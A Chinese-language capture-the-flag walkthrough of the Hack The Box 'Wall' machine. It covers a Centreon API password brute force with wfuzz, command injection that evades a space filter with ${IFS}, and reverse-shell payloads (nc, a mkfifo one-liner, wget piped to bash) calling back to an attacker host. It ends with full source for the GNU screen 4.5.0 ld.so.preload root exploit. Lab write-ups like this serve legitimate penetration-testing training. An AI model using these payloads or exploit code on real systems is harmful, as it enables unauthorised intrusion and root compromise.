前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >靶场练习 | Wall (hack the box)

靶场练习 | Wall (hack the box)

作者头像
安全小王子
发布于 2020-12-14 08:05:19
发布于 2020-12-14 08:05:19
63100
代码可运行
举报
文章被收录于专栏:betasecbetasec
运行总次数:0
代码可运行

声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!

START

0x01初始访问

nmap扫描结果:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
|   256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_  256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问80端口

http://10.10.10.157/monitoring ---> Protected area by the admin

系统提示没有权限访问

绕过方式:

burp抓包修改请求方式为POST成功绕过验证,301跳转

随后点击上方的 Follow Redirection 即可跟随到跳转页面

0x02使用最朴素的方法得到账密

http://10.10.10.157/centreon/ --->centreon v. 19.04.0 登录页面 ----> RCE (需要管理员账户密码)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
web页面默认凭据 admin/centreon   
ssh 默认凭据 root:centreon

默认凭据失效;尝试爆破,但是存在CSRF保护,每次验证过后都会重新生成令牌

当时可以利用该应用的API接口:相关文档

https://documentation.centreon.com/docs/centreon/en/19.04/api/api_rest/index.html

POST方式认证发送"username=admin&password=***"到http://xx.xx.xx.xx/centreon/api/index.php?action=authenticate --->认证成功返回200状态码,否则401

使用wfuzz工具进行爆破

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
wfuzz -z file,/usr/share/wordlists/rockyou.txt -d “username=admin&password=FUZZ” –sc 200 http://10.10.10.157/centreon/api/index.php?action=authenticate
爆破结果:admin:password1

0x03利用centreon RCE漏洞反弹shell

在kali下searchsploit搜索相关centreon得应用漏洞

对比以前搜集的该应用的版本信息,找到远程代码执行的py脚本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python 47069.py   http://10.10.10.157/centreon  admin password1  10.10.14.67 4444  

发现并没有返回shell到nc,猜测存在过滤。

手工尝试:

Configuration-->Pollers --->Pollers---->add--->Monitoring Engine Binary 字段,命令注入

保存-->Expore Configuration-->Expore

命令执行绕过测试:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ls -al ####返回Forbidden
ls${IFS}al ####正常返回结果----->对空格进行过滤
反弹shell:
nc${IFS}10.10.14.67${IFS}1337${IFS}-e${IFS}/bin/bash;----> 保存的时候Forbidden
rm${IFS}/tmp/f;mkfifo${IFS}/tmp/f;cat${IFS}/tmp/f|/bin/sh${IFS}-i${IFS}2>&1|nc${IFS}10.10.14.67${IFS}1337${IFS}>/tmp/f;
没有回连;受符号影响???改用base64
echo${IFS}bmNhdCAxMC4xMC4xNC42NyA0NDQ0IC1lIC9iaW4vYmFzaAo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash;
返回错误:sh: 1: -v: not found

尝试远程加载paylaod执行

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
kali@kali:~$ cat shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.67 1337 >/tmp/f

填入paylaod:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
wget${IFS}-qO-${IFS}http://10.10.14.67:8000/shell${IFS}|${IFS}bash;

成功反弹www-data shell

0x04权限提升

查看可以suid 提权的可执行文件

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$ find / -perm -u=s -type f 2>/dev/null
/bin/screen-4.5.0
.....

按照sh教程走,生成对应文件

libhax.c

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

编译命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
gcc -fPIC -shared -ldl -o libhax.so libhax.c

rootshell.c

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

编译命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
gcc -o rootshell rootshell.c

exploit.sh

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...

将 libhax.so rootshell exploit.sh上传到目标机器,./执行提取的sh脚本,成功提权

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-12-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
VulnHub通关日记-DC_5-Walkthrough
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Gcow安全团队
2020/03/06
7740
【Vulnhub靶机系列】DC5
那说明下面这一块footer是另外一个文件加载的,如果是写死在网页里面的话不会出现这种情况
Ms08067安全实验室
2022/09/26
5970
打靶系列之-DC-5
在页面中多浏览一下,发现Contact模块下可以输入内容,于是尝试多输入几次之后,发现了有意思的地方
用户6343818
2021/08/26
9530
打靶系列之-DC-5
靶机渗透DC-5
注意,Shell需要进入/tmp/目录下,同时kali也是在/tmp/目录下开启服务,否则传输会找不到文件。
HipHip
2020/04/18
4860
靶机渗透DC-5
Hack the box_Wall
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
6330
Hack the box_Wall
DC-5靶机渗透实战
这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-5.html
网络安全自修室
2020/07/22
9621
Vulnhub - DC系列
其中Contact模块可以提交数据,随便填一下提交发现被重定向到thankyou.php页面,并且底部的年份也发生了变化,接着尝试包含具有这些参数的文件,可能存在LFI漏洞
MssnHarvey
2023/02/27
9380
Vulnhub - DC系列
VulnHub靶机渗透之DC:5
这次的内容是DC系列的第五个靶机,不得不说这个系列每一个靶机都很有代表性,闲话少叙,搞起来。
光明SAMA
2019/07/25
1.4K0
VulnHub靶机渗透之DC:5
靶场攻略 | Chaos (hack the box)
|_http-title: Site doesn't have a title (text/html).
安全小王子
2021/04/02
1K0
Holiday -- hack the box
Holiday is an insane box officially. It's really difficult to get the user permission. The most difficult part should be how to pass the XSS filter. It may need a lot of time. And the root privesc is based on the exploitation of npm install which is relatively fresh.
madneal
2019/11/28
6780
每周打靶 | Vulnhub-DC5靶机渗透实战
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2023/09/02
4580
每周打靶 | Vulnhub-DC5靶机渗透实战
vulnhub靶场之DC-8靶场实战(超详细)
访问网站首页,http://192.168.111.143/?nid=1,通过nid进行传参
红队蓝军
2024/08/14
4180
vulnhub靶场之DC-8靶场实战(超详细)
Hack the Box - Obscurity
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Obscurity”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/20
1.9K0
靶场攻略 | DC3 (Vulnhub)
joomscan:https://github.com/OWASP/joomscan
安全小王子
2021/05/11
9950
靶场攻略 | DC3 (Vulnhub)
靶场实战(19):OSCP备考之VulnHub HA WORDY
使用命令sudo -u root nmap 172.16.33.108 -n -Pn -p- --reason -sV -sC -O发现主机开放的端口、提供的服务、使用的组件、组件的版本。
OneMoreThink
2024/10/15
1310
靶场实战(19):OSCP备考之VulnHub HA WORDY
Cronos -- hack the box
3 ports is open, detect the detailed services:
madneal
2019/11/28
5150
Hack the box - Mango
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Mango”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
2.6K1
Hack the box - Mango
Bashed -- hack the box
Only port 80 is open, it may be an easy box. And the truth is that it is really an easy box.
madneal
2019/11/28
1K0
Nibbles - Hack the box
Target: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44
madneal
2019/11/28
6540
Hack the box靶机实战:Haystack
HayStack 在 HTB 里面的难度评级是简单,但其实它一点都不简单。在一堆西班牙语中找到用户名和密码真的好头痛。对于 root 权限,你应该对 ELK 有基本的理解。因此,这台机器还是比较新颖的。随带提一句,前段时间出现的 Kibana RCE 漏洞就可以拿来利用。
FB客服
2019/12/09
7900
Hack the box靶机实战:Haystack
相关推荐
VulnHub通关日记-DC_5-Walkthrough
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
查看详情【社区公告】 技术创作特训营有奖征文